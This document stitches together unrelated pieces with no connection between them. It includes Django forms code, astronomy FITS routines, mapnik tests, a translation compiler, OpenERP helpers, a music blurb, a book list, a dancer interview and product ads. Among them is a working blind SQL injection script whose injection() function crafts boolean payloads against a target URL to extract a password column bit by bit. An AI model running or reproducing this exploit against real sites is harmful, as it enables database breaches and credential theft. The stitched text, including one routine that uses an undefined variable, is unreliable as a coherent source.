from datetime import timedelta as td
import json
import re
from urllib.parse import quote, urlencode

from django import forms
from django.forms import URLField
from django.conf import settings
from django.core.exceptions import ValidationError
from hc.front.validators import (
    CronExpressionValidator,
    TimezoneValidator,
    WebhookValidator,
)
import requests


class HeadersField(forms.Field):
    message = """Use "Header-Name: value" pairs, one per line."""

    def to_python(self, value):
        if not value:
            return {}

        headers = {}
        for line in value.split("\n"):
            if not line.strip():
                continue

            if ":" not in line:
                raise ValidationError(self.message)

            n, v = line.split(":", maxsplit=1)
            n, v = n.strip(), v.strip()
            if not n or not v:
                raise ValidationError(message=self.message)

            headers[n] = v

        return headers

    def validate(self, value):
        super().validate(value)
        for k, v in value.items():
            if len(k) > 1000 or len(v) > 1000:
                raise ValidationError("Value too long")


class NameTagsForm(forms.Form):
    name = forms.CharField(max_length=100, required=False)
    tags = forms.CharField(max_length=500, required=False)
    desc = forms.CharField(required=False)

    def clean_tags(self):
        result = []

        for part in self.cleaned_data["tags"].split(" "):
            part = part.strip()
            if part != "":
                result.append(part)

        return " ".join(result)


class FilteringRulesForm(forms.Form):
    filter_by_subject = forms.ChoiceField(choices=(("no", "no"), ("yes", "yes")))
    subject = forms.CharField(required=False, max_length=100)
    subject_fail = forms.CharField(required=False, max_length=100)
    methods = forms.ChoiceField(required=False, choices=(("", "Any"), ("POST", "POST")))
    manual_resume = forms.BooleanField(required=False)

    def clean_subject(self):
        if self.cleaned_data["filter_by_subject"] == "yes":
            return self.cleaned_data["subject"]
        return ""

    def clean_subject_fail(self):
        if self.cleaned_data["filter_by_subject"] == "yes":
            return self.cleaned_data["subject_fail"]
        return ""


class TimeoutForm(forms.Form):
    timeout = forms.IntegerField(min_value=60, max_value=2592000)
    grace = forms.IntegerField(min_value=60, max_value=2592000)

    def clean_timeout(self):
        return td(seconds=self.cleaned_data["timeout"])

    def clean_grace(self):
        return td(seconds=self.cleaned_data["grace"])


class CronForm(forms.Form):
    schedule = forms.CharField(max_length=100, validators=[CronExpressionValidator()])
    tz = forms.CharField(max_length=36, validators=[TimezoneValidator()])
    grace = forms.IntegerField(min_value=1, max_value=43200)


class AddOpsgenieForm(forms.Form):
    error_css_class = "has-error"
    region = forms.ChoiceField(initial="us", choices=(("us", "US"), ("eu", "EU")))
    key = forms.CharField(max_length=40)


PRIO_CHOICES = [
    ("-2", "Lowest Priority"),
    ("-1", "Low Priority"),
    ("0", "Normal Priority"),
    ("1", "High Priority"),
    ("2", "Emergency Priority"),
]


class AddPushoverForm(forms.Form):
    error_css_class = "has-error"
    pushover_user_key = forms.CharField()
    prio = forms.ChoiceField(initial="0", choices=PRIO_CHOICES)
    prio_up = forms.ChoiceField(initial="0", choices=PRIO_CHOICES)

    def get_value(self):
        key = self.cleaned_data["pushover_user_key"]
        prio = self.cleaned_data["prio"]
        prio_up = self.cleaned_data["prio_up"]
        return "%s|%s|%s" % (key, prio, prio_up)


class AddEmailForm(forms.Form):
    error_css_class = "has-error"
    value = forms.EmailField(max_length=100)
    down = forms.BooleanField(required=False, initial=True)
    up = forms.BooleanField(required=False, initial=True)

    def clean(self):
        super().clean()

        down = self.cleaned_data.get("down")
        up = self.cleaned_data.get("up")

        if not down and not up:
            self.add_error("down", "Please select at least one.")


class AddUrlForm(forms.Form):
    error_css_class = "has-error"
    value = forms.URLField(max_length=1000, validators=[WebhookValidator()])


METHODS = ("GET", "POST", "PUT")


class WebhookForm(forms.Form):
    error_css_class = "has-error"
    name = forms.CharField(max_length=100, required=False)

    method_down = forms.ChoiceField(initial="GET", choices=zip(METHODS, METHODS))
    body_down = forms.CharField(max_length=1000, required=False)
    headers_down = HeadersField(required=False)
    url_down = URLField(
        max_length=1000, required=False, validators=[WebhookValidator()]
    )

    method_up = forms.ChoiceField(initial="GET", choices=zip(METHODS, METHODS))
    body_up = forms.CharField(max_length=1000, required=False)
    headers_up = HeadersField(required=False)
    url_up = forms.URLField(
        max_length=1000, required=False, validators=[WebhookValidator()]
    )

    def clean(self):
        super().clean()

        url_down = self.cleaned_data.get("url_down")
        url_up = self.cleaned_data.get("url_up")

        if not url_down and not url_up:
            if not self.has_error("url_down"):
                self.add_error("url_down", "Enter a valid URL.")

    def get_value(self):
        return json.dumps(dict(self.cleaned_data), sort_keys=True)


class AddShellForm(forms.Form):
    error_css_class = "has-error"

    cmd_down = forms.CharField(max_length=1000, required=False)
    cmd_up = forms.CharField(max_length=1000, required=False)

    def get_value(self):
        return json.dumps(dict(self.cleaned_data), sort_keys=True)


class PhoneNumberForm(forms.Form):
    error_css_class = "has-error"
    label = forms.CharField(max_length=100, required=False)
    phone = forms.CharField()

    def clean_phone(self):
        v = self.cleaned_data["phone"]

        stripped = v.encode("ascii", "ignore").decode("ascii")
        stripped = stripped.replace(" ", "").replace("-", "")
        if not re.match(r"^\+\d{5,15}$", stripped):
            raise forms.ValidationError("Invalid phone number format.")

        return stripped

    def get_json(self):
        return json.dumps({"value": self.cleaned_data["phone"]})


class PhoneUpDownForm(PhoneNumberForm):
    up = forms.BooleanField(required=False, initial=True)
    down = forms.BooleanField(required=False, initial=True)

    def get_json(self):
        return json.dumps(
            {
                "value": self.cleaned_data["phone"],
                "up": self.cleaned_data["up"],
                "down": self.cleaned_data["down"],
            }
        )


class ChannelNameForm(forms.Form):
    name = forms.CharField(max_length=100, required=False)


class AddMatrixForm(forms.Form):
    error_css_class = "has-error"
    alias = forms.CharField(max_length=100)

    def clean_alias(self):
        v = self.cleaned_data["alias"]

        # validate it by trying to join
        url = settings.MATRIX_HOMESERVER
        url += "/_matrix/client/r0/join/%s?" % quote(v)
        url += urlencode({"access_token": settings.MATRIX_ACCESS_TOKEN})
        r = requests.post(url, {})
        if r.status_code == 429:
            raise forms.ValidationError(
                "Matrix server returned status code 429 (Too Many Requests), "
                "please try again later."
            )

        doc = r.json()
        if "error" in doc:
            raise forms.ValidationError("Response from Matrix: %s" % doc["error"])

        self.cleaned_data["room_id"] = doc["room_id"]

        return v


class AddAppriseForm(forms.Form):
    error_css_class = "has-error"
    url = forms.CharField(max_length=512)


class AddPdForm(forms.Form):
    error_css_class = "has-error"
    value = forms.CharField(max_length=32)


ZULIP_TARGETS = (("stream", "Stream"), ("private", "Private"))


class AddZulipForm(forms.Form):
    error_css_class = "has-error"
    bot_email = forms.EmailField(max_length=100)
    api_key = forms.CharField(max_length=50)
    site = forms.URLField(max_length=100, validators=[WebhookValidator()])
    mtype = forms.ChoiceField(choices=ZULIP_TARGETS)
    to = forms.CharField(max_length=100)

    def get_value(self):
        return json.dumps(dict(self.cleaned_data), sort_keys=True)


class AddTrelloForm(forms.Form):
    token = forms.RegexField(regex=r"^[0-9a-fA-F]{64}$")
    board_name = forms.CharField(max_length=100)
    list_name = forms.CharField(max_length=100)
    list_id = forms.RegexField(regex=r"^[0-9a-fA-F]{16,32}$")

    def get_value(self):
        return json.dumps(dict(self.cleaned_data), sort_keys=True)
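A minimal sketch of how HeadersField parses its textarea input, assuming the module above is importable and Django settings are configured; the header names and values are illustrative only:

# Hypothetical usage sketch -- assumes hc.front.forms is importable.
from django.core.exceptions import ValidationError
from hc.front.forms import HeadersField

field = HeadersField(required=False)

# Well-formed input: one "Header-Name: value" pair per line becomes a dict.
headers = field.to_python("X-Priority: high\nX-Source: healthchecks")
assert headers == {"X-Priority": "high", "X-Source": "healthchecks"}

# A line without ":" is rejected with the field's error message.
try:
    field.to_python("not-a-header")
except ValidationError:
    pass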
Smashing down barriers with song. Music from the USA, Democratic Republic of Congo, Cape Verde, Mauritius, Guadeloupe, India, Pakistan, Mali, Mauritania, Turkey, Puerto Rico, Niger, and beyond. Seek the Earth and she will sing. Music from Democratic Republic of Congo, Mexico, Ethiopia, USA, Sudan, Niger, Cuba, South Africa and beyond. Enjoy an hour of vibrant musical diversity. Listen to sounds from Haiti, Mali, Tuva, Malaysia, India, Mauritius, USA, Bulgaria, Cameroon, Democratic Republic of Congo, Mauritania and beyond. Cycles of inspiration.
""" desispec.io.fluxcalibration =========================== IO routines for flux calibration. """ from __future__ import absolute_import, print_function import os from astropy.io import fits import numpy,scipy from desiutil.depend import add_dependencies from .util import fitsheader, native_endian, makepath def write_stdstar_models(norm_modelfile,normalizedFlux,wave,fibers,data,header=None): """Writes the normalized flux for the best models. Args: norm_modelfile : output file path normalizedFlux : 2D array of flux[nstdstars, nwave] wave : 1D array of wavelengths[nwave] in Angstroms fibers : 1D array of fiberids for these spectra data : meta data table about which templates best fit; should include BESTMODEL, TEMPLATEID, CHI2DOF, REDSHIFT """ hdr = fitsheader(header) add_dependencies(hdr) hdr['EXTNAME'] = ('FLUX', 'erg/s/cm2/A') hdr['BUNIT'] = ('erg/s/cm2/A', 'Flux units') hdu1=fits.PrimaryHDU(normalizedFlux.astype('f4'), header=hdr.copy()) hdr['EXTNAME'] = ('WAVELENGTH', '[Angstroms]') hdr['BUNIT'] = ('Angstrom', 'Wavelength units') hdu2 = fits.ImageHDU(wave.astype('f4'), header=hdr.copy()) hdr['EXTNAME'] = ('FIBERS', 'no dimension') hdu3 = fits.ImageHDU(fibers, header=hdr.copy()) hdr['EXTNAME'] = ('METADATA', 'no dimension') from astropy.io.fits import Column BESTMODEL=Column(name='BESTMODEL',format='K',array=data['BESTMODEL']) TEMPLATEID=Column(name='TEMPLATEID',format='K',array=data['TEMPLATEID']) CHI2DOF=Column(name='CHI2DOF',format='D',array=data['CHI2DOF']) REDSHIFT=Column(name='REDSHIFT',format='D',array=data['REDSHIFT']) cols=fits.ColDefs([BESTMODEL,TEMPLATEID,CHI2DOF,REDSHIFT]) tbhdu=fits.BinTableHDU.from_columns(cols,header=hdr) hdulist=fits.HDUList([hdu1,hdu2,hdu3,tbhdu]) tmpfile = norm_modelfile+".tmp" hdulist.writeto(tmpfile, clobber=True, checksum=True) os.rename(tmpfile, norm_modelfile) #fits.append(norm_modelfile,cols,header=tbhdu.header) def read_stdstar_models(filename): """Read stdstar models from filename. Args: filename (str): File containing standard star models. Returns: read_stdstar_models (tuple): flux[nspec, nwave], wave[nwave], fibers[nspec] """ with fits.open(filename, memmap=False) as fx: flux = native_endian(fx['FLUX'].data.astype('f8')) wave = native_endian(fx['WAVELENGTH'].data.astype('f8')) fibers = native_endian(fx['FIBERS'].data) return flux, wave, fibers def write_flux_calibration(outfile, fluxcalib, header=None): """Writes flux calibration. Args: outfile : output file name fluxcalib : FluxCalib object Options: header : dict-like object of key/value pairs to include in header """ hx = fits.HDUList() hdr = fitsheader(header) add_dependencies(hdr) hdr['EXTNAME'] = 'FLUXCALIB' hdr['BUNIT'] = ('(electrons/A) / (erg/s/cm2/A)', 'electrons per flux unit') hx.append( fits.PrimaryHDU(fluxcalib.calib.astype('f4'), header=hdr) ) hx.append( fits.ImageHDU(fluxcalib.ivar.astype('f4'), name='IVAR') ) hx.append( fits.CompImageHDU(fluxcalib.mask, name='MASK') ) hx.append( fits.ImageHDU(fluxcalib.wave, name='WAVELENGTH') ) hx.writeto(outfile+'.tmp', clobber=True, checksum=True) os.rename(outfile+'.tmp', outfile) return outfile def read_flux_calibration(filename): """Read flux calibration file; returns a FluxCalib object """ # Avoid a circular import conflict at package install/build_sphinx time. 
from ..fluxcalibration import FluxCalib fx = fits.open(filename, memmap=False, uint=True) calib = native_endian(fx[0].data.astype('f8')) ivar = native_endian(fx["IVAR"].data.astype('f8')) mask = native_endian(fx["MASK"].data) wave = native_endian(fx["WAVELENGTH"].data.astype('f8')) fluxcalib = FluxCalib(wave, calib, ivar, mask) fluxcalib.header = fx[0].header fx.close() return fluxcalib def read_stdstar_templates(stellarmodelfile): """ Reads an input stellar model file Args: stellarmodelfile : input filename Returns (wave, flux, templateid, teff, logg, feh) tuple: wave : 1D[nwave] array of wavelengths [Angstroms] flux : 2D[nmodel, nwave] array of model fluxes templateid : 1D[nmodel] array of template IDs for each spectrum teff : 1D[nmodel] array of effective temperature for each model logg : 1D[nmodel] array of surface gravity for each model feh : 1D[nmodel] array of metallicity for each model """ phdu=fits.open(stellarmodelfile, memmap=False) #- New templates have wavelength in HDU 2 if len(phdu) >= 3: wavebins = native_endian(phdu[2].data) #- Old templates define wavelength grid in HDU 0 keywords else: hdr0=phdu[0].header crpix1=hdr0['CRPIX1'] crval1=hdr0['CRVAL1'] cdelt1=hdr0['CDELT1'] if hdr0["LOGLAM"]==1: #log bins wavebins=10**(crval1+cdelt1*numpy.arange(len(phdu[0].data[0]))) else: #lin bins model_wave_step = cdelt1 model_wave_offset = (crval1-cdelt1*(crpix1-1)) wavebins=model_wave_step*numpy.arange(n_model_wave) + model_wave_offset paramData=phdu[1].data templateid=paramData["TEMPLATEID"] teff=paramData["TEFF"] logg=paramData["LOGG"] feh=paramData["FEH"] fluxData=native_endian(phdu[0].data) phdu.close() return wavebins,fluxData,templateid,teff,logg,feh
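A hedged round-trip sketch of the stdstar model I/O above, assuming desispec, desiutil, numpy, and an astropy version that still accepts writeto(..., clobber=True) are installed; the file name, shapes, and values are illustrative only:

# Illustrative sketch -- all names and values here are placeholders.
import numpy as np
from desispec.io.fluxcalibration import write_stdstar_models, read_stdstar_models

nstd, nwave = 2, 100
flux = np.ones((nstd, nwave))                       # dummy normalized fluxes
wave = np.linspace(3600.0, 9800.0, nwave)           # Angstroms
fibers = np.array([5, 7])
data = {
    'BESTMODEL': np.array([11, 23]),
    'TEMPLATEID': np.array([11, 23]),
    'CHI2DOF': np.array([1.1, 0.9]),
    'REDSHIFT': np.array([0.0, 0.0]),
}

write_stdstar_models('stdstars.fits', flux, wave, fibers, data)
rflux, rwave, rfibers = read_stdstar_models('stdstars.fits')
assert rflux.shape == (nstd, nwave)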
Attack of Professor Zoom!, The - Manning, Matthew K.
Captain Boomerang's Comeback! - Hoena, Blake A.
Captain Cold's Arctic Eruption - Mason, Jane B.
Ice and Flame - Mason, Jane B.
Killer Kaleidoscope - Bright, J. E.
#!/usr/bin/env python3
#
# -*- coding: utf8 -*-

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2014 Yannick Méheut <useless (at) utouch (dot) fr>

import sys
import requests


def injection(target_url, string, column, table, where, index):
    '''
    This function will be performing the injection.
    It will find each character, bit by bit.
        * target_url: the URL where the injection will be performed
        * string: the string we'll look for for the binary search outcome

    The function will return the found password.
    '''
    print('[wait] retrieving data:', end='\t')
    sys.stdout.flush()

    data = ''
    i = 1
    # While we don't have the entire password
    while True:
        char = 0
        for j in range(1, 8):
            # The injection performed here is URL-based
            # To use another mean of injection (HTTP Headers, Cookies...)
            # change the crafting between the hashtags

            #### CHANGE HERE
            if '?' in target_url:
                separator = '&'
            else:
                separator = '?'
            url = target_url + separator + "u=' OR " + \
                "(select mid(lpad(bin(ord(mid({0},{1},1))),7,'0'),{2},1) " + \
                "from {3} {4} " + \
                "limit {5},1) = 1;-- &p=bla"
            url = url.format(column, i, j, table, where, index)
            r = requests.get(url)
            #### END OF CHANGE

            output = r.text

            # We seek which half of authorized_characters
            # we should search in
            if string in output:
                char += 2**(6 - j + 1)

        if char != 0:
            # When we find a character, we display it on stdout
            print(chr(char), end='')
            sys.stdout.flush()
            # We add it to the existing data
            data += chr(char)
            i += 1
        else:
            break

    print('\r[done]')

    return data
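A quick sanity check of the bit arithmetic above: MySQL's lpad(bin(ord(c)), 7, '0') yields the 7-bit binary form of a character, and for bit position j in 1..7 the loop adds 2**(6 - j + 1), i.e. 2**(7 - j). The snippet below reproduces that weighting locally for a sample character:

# Local check of the bit reconstruction used in injection().
c = 'a'
bits = format(ord(c), '07b')       # '1100001', same as lpad(bin(ord('a')),7,'0')
char = 0
for j in range(1, 8):              # j indexes the 7 bits, MSB first
    if bits[j - 1] == '1':
        char += 2 ** (6 - j + 1)   # same weighting as the loop above
assert chr(char) == 'a'            # 64 + 32 + 1 == 97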
homewatchguru serves the Tampa Bay Beaches of Florida, Pinellas County, St. Petersburg, Manatee County, Sarasota and the surrounding areas. Pinellas County: Belleair Beach FL, Clearwater and Clearwater Beach FL, Dunedin FL, Gulfport FL, Indian Rocks Beach FL, Indian Shores FL, Largo FL, Madeira Beach FL, Palm Harbor FL, Pasadena FL, Pass-a-Grille FL, Pinellas Park FL, Redington Beach FL, Redington Shores FL, Safety Harbor FL, Sand Key FL, Seminole FL, St. Petersburg FL, St. Pete Beach FL, Tierra Verde FL, Treasure Island FL. Manatee County: Anna Maria Island FL, Bradenton FL, Bradenton Beach FL, Holmes Beach FL, Longboat Key FL. Sarasota County: Boca Grande FL, Englewood FL, North Port FL, Sarasota FL, Siesta Key FL, Osprey FL, Venice FL. Broward County: Fort Lauderdale and surroundings.
#!/usr/bin/env python

from nose.tools import *
from utilities import execution_path

import os, sys, glob, mapnik

def setup():
    # All of the paths used are relative, if we run the tests
    # from another directory we need to chdir()
    os.chdir(execution_path('.'))

# We expect these files to not raise any
# exceptions at all
def assert_loads_successfully(file):
    m = mapnik.Map(512, 512)

    strict = True
    mapnik.load_map(m, file, strict)

    # libxml2 is not smart about paths, and clips the last directory off
    # of a path if it does not end in a trailing slash
    base_path = os.path.dirname(file) + '/'
    mapnik.load_map_from_string(m,open(file,'rb').read(),strict,base_path)

# We expect these files to raise a RuntimeError
# and fail if there isn't one (or a different type
# of exception)
@raises(RuntimeError)
def assert_raises_runtime_error(file):
    m = mapnik.Map(512, 512)

    strict = True
    mapnik.load_map(m, file, strict)

def test_broken_files():
    broken_files = glob.glob("../data/broken_maps/*.xml")

    # Add a filename that doesn't exist
    broken_files.append("../data/broken/does_not_exist.xml")

    for file in broken_files:
        yield assert_raises_runtime_error, file

def test_good_files():
    good_files = glob.glob("../data/good_maps/*.xml")

    for file in good_files:
        yield assert_loads_successfully, file
Music, dance and fashion have always been interlinked in street culture, and dance culture in China is definitely growing right now. We sat down with one of the more prominent dancers in Guangzhou, Foshan, aptly named Biao Ge, and found out that it's not just Wong Fei Hong that is famous in Foshan. FI : Hi Biao Ge, I am curious about your real name, would you be able to share it with us, and what are you up to? BG : HA, Hi everyone, my name is actually Ye Biao, and people call me Biao Ge as a form of respect, not because I am old haha! I am a professional dancer and I am based out of Foshan, GZ. FI : How's the dance scene in Foshan? Why did you decide to be a dancer? BG : The dance scene is massive here, and is growing every day. I have been seeing young dancers stepping up the game and getting better every day. FI : You are a dance instructor at a pretty young age, how does that feel? BG : To be an instructor, it is definitely not an easy task, but for me I would say I am lucky as well. A good instructor needs to have a strong foundation, and with what I have, I believe it is sufficient to train other students. It's a totally different process to be an instructor as you need to impart your skills to students who, more often than not, are learning dance for the first time, and what you teach them is of utmost importance as you are the first person that brings the proper spirit and mindset of the world of dance to them. FI : What do you hope to see for the future of dance culture in China? BG : I think the dance culture is really strong and there are a lot of dance crews with a lot of potential and flair. The dance crews that we see now in China are probably on par with many international crews, but the reason that they aren't able to compete on the international level is due to visa problems, or financial situations where these crews aren't able to travel outside of China. My wish is to see these issues solved, which can be done easily via our central government, especially on visas and travel documentation. Funds to support these talented dancers can also come from both the government and private companies. With this support, I believe that the dance culture in China can reach its full potential. FI : In recent months, the hip hop and rap wave has taken China by storm, and dance is definitely one of the elements of the street culture inspired by hip hop. We have seen Rap Of China, and if there is a similar reality TV series for dance, would you take part? BG : Of course! In fact, there are some talks about having a program like that and I believe it will be launched next year! This will be a great platform for the dancers who have been grinding since Day One to become recognised. FI : If you were to compare yourself to a piece of clothing, what would you be? BG : I would want to be a versatile piece of clothing. Something that has style yet function, simple yet stylish. I can be anything you want and something that fits your body and perfectly integrates into your lifestyle. I am simple, but there's more than meets the eye. FI : Do you have any advice for aspiring dancers? BG : I think my advice is simple, but it is quite hard to follow, cos as a dancer myself, I know how it feels when your jam comes on and your body will start moving and groovin. haha. Sleep early, keep your meal times regular and drink more warm water (haha) Do I sound like a real teacher now? I know it feels good to drink cold water right after a great dance workout but it's not good for health.
Dance in itself is an activity that strengthens your mind and body, so if you do not take good care of your health, you might not be able to reach your full potential. FI : What about you, who do you look up to? BG : I really look up to 经伟老师, because besides dancing, he asks us questions on how to evolve and perfect the art of dancing. Questions like how to make a simple dance move into something with more flair, and how to differentiate yourself from other dancers. These thought-provoking questions force you to think beyond just dancing, about how to reinvent yourself and create a style of individuality, and how to combine music and dance as an art form. When I first saw Biao Ge's video back in March, I was impressed, not because of how sharp and snappy his dance moves were, but by how he managed to combine Eastern and Western elements in his video. As I found out more about him, I was impressed to know that at 27, he is already an instructor and that there is a bustling dance scene not just in GZ, but across China. Feeling sheepish at my lack of knowledge and understanding of my Chinese friends, I realised that the culture is growing at such a fast rate that we need to play catch up real soon. Talking to Biao also made me realise that we are very fortunate to have a good infrastructure in Singapore which allows our creative talents to reach out to other similar communities on an international level, and vice versa. Dance might be relatively new in China, and talking to Biao, I sense his fervour and vision on how he wants to be a part of an evolution that takes the existing dance culture that came from the West, weaves Chinese influences into it, and brings it to the next level. This, to me, is the real Dance Dance Revolution.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2005, 2006,2010 Zuza Software Foundation
#
# This file is part of the translate-toolkit
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with translate; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

"""Compile XLIFF and Gettext PO localization files into Gettext MO
(Machine Object) files

See: http://translate.sourceforge.net/wiki/toolkit/pocompile for examples and
usage instructions
"""

from translate.storage import factory
from translate.storage import mo
from translate.misc.multistring import multistring


def _do_msgidcomment(string):
    return u"_: %s\n" % string


class POCompile:

    def convertstore(self, inputfile, includefuzzy=False):
        outputfile = mo.mofile()
        for unit in inputfile.units:
            if unit.istranslated() or (unit.isfuzzy() and includefuzzy and unit.target) or unit.isheader():
                mounit = mo.mounit()
                if unit.isheader():
                    mounit.source = ""
                else:
                    mounit.source = unit.source
                    context = unit.getcontext()
                    if unit.msgidcomment:
                        if mounit.hasplural():
                            mounit.source = multistring(_do_msgidcomment(unit.msgidcomment) + mounit.source, *mounit.source.strings[1:])
                        else:
                            mounit.source = _do_msgidcomment(unit.msgidcomment) + mounit.source
                    elif context:
                        mounit.msgctxt = [context]
                mounit.target = unit.target
                outputfile.addunit(mounit)
        return str(outputfile)


def convertmo(inputfile, outputfile, templatefile, includefuzzy=False):
    """reads in a base class derived inputfile, converts using pocompile, writes to outputfile"""
    # note that templatefile is not used, but it is required by the converter...
    inputstore = factory.getobject(inputfile)
    if inputstore.isempty():
        return 0
    convertor = POCompile()
    outputmo = convertor.convertstore(inputstore, includefuzzy)
    # We have to make sure that we write the files in binary mode, therefore we
    # reopen the file accordingly
    outputfile.close()
    outputfile = open(outputfile.name, 'wb')
    outputfile.write(outputmo)
    return 1


def main():
    from translate.convert import convert
    formats = {"po": ("mo", convertmo), "xlf": ("mo", convertmo)}
    parser = convert.ConvertOptionParser(formats, usepots=False, description=__doc__)
    parser.add_fuzzy_option()
    parser.run()


if __name__ == '__main__':
    main()
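A hedged sketch of driving POCompile directly rather than through the command-line parser, assuming the translate-toolkit is installed (in the toolkit's usual layout this module lives at translate.tools.pocompile); 'messages.po' and 'messages.mo' are placeholder paths:

# Illustrative usage -- file names are placeholders.
from translate.storage import factory
from translate.tools.pocompile import POCompile  # assumed module location

store = factory.getobject('messages.po')     # parse the PO file into a store
mo_data = POCompile().convertstore(store, includefuzzy=False)
with open('messages.mo', 'wb') as out:       # MO is binary, so write in 'wb' mode
    out.write(mo_data)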
This full size 12 cup Bundt(r) pan is made from cast aluminum that heats evenly for perfect cake texture and color. Sturdy cast aluminum provides superior baking performance. The pan is non-stick coated for easy release and clean-up. Bakes elegant, picture-perfect cakes with ease in a shape loved by millions. The pan can be used for many Bundt(r) recipes, pull-apart bread, monkey bread as well as being a great jello mold. Use with a baker's non-stick spray (flour-based) to help release easily. We recommend that the pan be hand washed to help extend the life of the non-stick coating. Color: Silver.
# -*- coding: utf-8 -*-
from osv import fields
from datetime import date,datetime,time
import logging

_logger = logging.getLogger(__name__)

# Time-slot choices (half-hour steps; labels are Chinese time strings)
def time_for_selection(self,cr,uid,context = None):
    ret = [("%02i:00" % i,"%02i时30分" % i) for i in range(24)] + \
          [("%02i:30" % i,"%02i时00分" % (i+1)) for i in range(24)]
    ret.sort()
    ret.pop()
    ret.append(("23:59","23时59分"))
    return ret

# Price list choices (hall / room / member / VIP / A-class / B-class prices)
def price_list_for_selection(self,cr,uid,context = None):
    ret =[("ting_price","大厅价"),("room_price","包厢价"),("member_price","会员价"),
          ("vip_price","贵宾价"),("a_price","A类价"),("b_price","B类价")]
    return ret

# Room state choices (free / in use / scheduled / locked / checked out /
# buyout / buytime / malfunction / cleaning / debugging / showing to guests)
def room_states_for_selection(self,cr,uid,context = None):
    ret =[("free","空闲"),("in_use","使用"),("scheduled","预定"),("locked","锁定"),
          ("checkout","已结账"),("buyout","买断"),("buytime","买钟"),("malfunction","故障"),
          ("clean","清洁"),("debug","调试"),("visit","带客")]
    return ret

# Gender choices
def sexes_for_select(self,cr,uid,context = None):
    ret=[("F","女"),("M","男")]
    return ret

# ID document types (national ID card / driver's licence / other)
def id_types_for_select(self,cr,uid,context = None):
    ret=[(1,"身份证"),(2,"驾驶证"),(3,"其他证件")]
    return ret

# Return the weekday abbreviation for an integer 0-6 (mon = 0 ... sun = 6)
def weekday_str(weekday_int):
    weekday_dict = {
        0 : 'mon',
        1 : 'tue',
        2 : 'wed',
        3 : 'thu',
        4 : 'fri',
        5 : 'sat',
        6 : 'sun'
    }
    return weekday_dict[weekday_int]

def current_user_tz(obj,cr,uid,context = None):
    """
    Get the timezone setting of the currently logged-in user.
    :param cursor cr: database cursor
    :param integer uid: id of the currently logged-in user
    """
    the_user = obj.pool.get('res.users').read(cr,uid,uid,['id','context_tz','name'])
    return the_user['context_tz']

def user_context_now(obj,cr,uid):
    """
    Get the local datetime of the currently logged-in user.
    :return: the localized current datetime
    """
    tz = current_user_tz(obj,cr,uid)
    context_now = fields.datetime.context_timestamp(cr,uid,datetime.now(),{"tz" : tz})
    return context_now

def minutes_delta(time_from,time_to):
    '''
    Compute the difference in minutes between two given times.
    :param time_from: string like '09:30', the start time
    :param time_to: string like '09:30', the end time
    :return: integer, difference between the two times in minutes
    '''
    array_time_from = [int(a) for a in time_from.split(':')]
    array_time_to = [int(a) for a in time_to.split(':')]
    t1 = time(array_time_from[0],array_time_from[1])
    t2 = time(array_time_to[0],array_time_to[1])
    return (t2.hour - t1.hour)*60 + (t2.minute - t1.minute)

def context_now_minutes_delta(obj,cr,uid,time_to):
    '''
    Compute the difference in minutes between now and a given time,
    calculated in the timezone of the currently logged-in user.
    :param object obj: osv object
    :param cursor cr: database cursor
    :param integer uid: currently logged-in user
    :param string time_to: the target time
    :return: integer, difference between the two times in minutes
    '''
    context_now = user_context_now(obj,cr,uid)
    return minutes_delta(context_now.strftime("%H:%M"),time_to)

def context_strptime(osv_obj,cr,uid,str_time):
    '''
    Convert a given time string into a datetime on the current day,
    based on the timezone of the currently logged-in user.
    :param osv_obj: osv database object
    :param cr: db cursor
    :param int uid: currently logged-in user
    :param str_time: time string like '09:30'
    :return datetime: the computed datetime object
    '''
    context_now = user_context_now(osv_obj,cr,uid)
    time_array = [int(a) for a in str_time.split(":")]
    ret = context_now.replace(hour=time_array[0],minute=time_array[1])
    return ret

def str_to_today_time(time_str):
    '''
    Convert a given string into a datetime on the current day.
    :param time_str: time string like 09:30:00
    :return: datetime object with today's date and the given time
    '''
    now = datetime.now()
    array_time = [int(a) for a in time_str.split(':')]
    ret = now.replace(hour=array_time[0],minute = array_time[1],second = array_time[2])
    return ret

def utc_time_between(str_time_from,str_time_to,str_cur_time):
    """
    Check whether a given time string falls within a given time range.
    Because times are stored uniformly in UTC, time_to may be smaller
    than time_from (the range then spans midnight).
    :param string str_time_from: time string like '09:10'
    :param string str_time_to: time string like '09:10'
    :param str_cur_time: the time string to compare
    :return: True if within the range, else False
    """
    if str_time_to > str_time_from:
        return str_cur_time >= str_time_from and str_cur_time <= str_time_to
    else:
        # time_from greater than time_to means the range spans midnight
        return (str_cur_time >= str_time_from and str_cur_time < '23:59:59') or \
               (str_cur_time >='00:00:00' and str_cur_time <= str_time_to)

def calculate_present_minutes(buy_minutes,promotion_buy_minutes = 0,promotion_present_minutes = 0):
    """
    Compute the bonus ("present") minutes for a purchase:
        purchased minutes / configured purchase length * configured bonus length
    :param buy_minutes: integer, purchased minutes
    :param promotion_buy_minutes: integer, purchase length set in the promotion
    :param promotion_present_minutes: integer, bonus length set in the promotion
    :return: integer, bonus minutes
    """
    # If no promotion is configured, there is no bonus;
    # return the purchased minutes directly
    if not promotion_buy_minutes:
        return buy_minutes
    present_minutes = buy_minutes / promotion_buy_minutes * promotion_present_minutes
    return present_minutes
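A small behaviour sketch of the pure helpers above (the OSV-bound functions need a running OpenERP server, so they are left out); values are illustrative and assume the module's functions are in scope:

# Pure-function behaviour sketch (Python 2, matching the module above).
print minutes_delta("09:30", "11:00")                        # 90
print weekday_str(0)                                         # 'mon'
# Range spanning midnight: times are stored in UTC, so time_to < time_from happens.
print utc_time_between('22:00:00', '02:00:00', '23:30:00')   # True
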